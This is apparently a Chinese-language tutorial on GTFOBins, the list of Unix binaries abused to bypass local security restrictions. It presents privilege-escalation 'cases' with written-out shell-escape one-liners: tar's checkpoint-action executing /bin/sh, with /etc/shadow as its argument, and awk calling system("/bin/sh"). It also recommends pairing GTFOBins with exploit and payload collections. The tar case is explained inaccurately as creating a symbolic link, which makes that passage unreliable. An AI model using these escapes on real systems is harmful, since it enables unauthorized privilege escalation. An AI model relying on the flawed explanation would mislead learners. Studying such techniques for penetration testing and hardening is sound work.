GTFOBins 开源项目教程
GTFOBins.github.ioGTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems项目地址:https://gitcode.com/gh_mirrors/gt/GTFOBins.github.io
项目介绍
GTFOBins(GTFO Binary)是一个精心策划的Unix二进制文件列表,这些二进制文件可以被利用来绕过本地安全限制。项目的主要目的是通过展示如何利用这些二进制文件来执行各种操作,如提权、绕过防火墙等,从而提高系统安全意识。
项目快速启动
要开始使用GTFOBins,首先需要克隆项目仓库到本地:
git clone https://github.com/GTFOBins/GTFOBins.github.io.git
克隆完成后,你可以通过浏览项目中的Markdown文件来了解每个二进制文件的具体使用方法。例如,如果你想查看curl
命令的使用方法,可以打开curl.md
文件。
应用案例和最佳实践
案例一:使用tar
进行提权
假设你有一个受限的shell,但需要提升权限。你可以使用tar
命令来创建一个符号链接,从而访问受限文件:
tar cf /dev/null /etc/shadow --checkpoint=1 --checkpoint-action=exec=/bin/sh
案例二:使用awk
执行系统命令
在某些情况下,你可能无法直接执行系统命令。使用awk
可以绕过这一限制:
awk 'BEGIN {system("/bin/sh")}'
典型生态项目
GTFOBins作为一个专注于Unix二进制文件利用的项目,与以下几个项目有着紧密的联系:
- Exploit Database:一个收集各种漏洞和利用代码的数据库,与GTFOBins结合使用可以更全面地了解和利用系统漏洞。
- PayloadsAllTheThings:一个收集各种渗透测试和安全评估中使用的有效载荷的项目,与GTFOBins结合可以提供更全面的攻击面。
- HackTricks:一个提供各种渗透测试技巧和方法的项目,与GTFOBins结合可以提供更深入的系统安全分析。
通过这些项目的结合使用,可以更有效地进行系统安全评估和渗透测试。
GTFOBins.github.ioGTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems项目地址:https://gitcode.com/gh_mirrors/gt/GTFOBins.github.io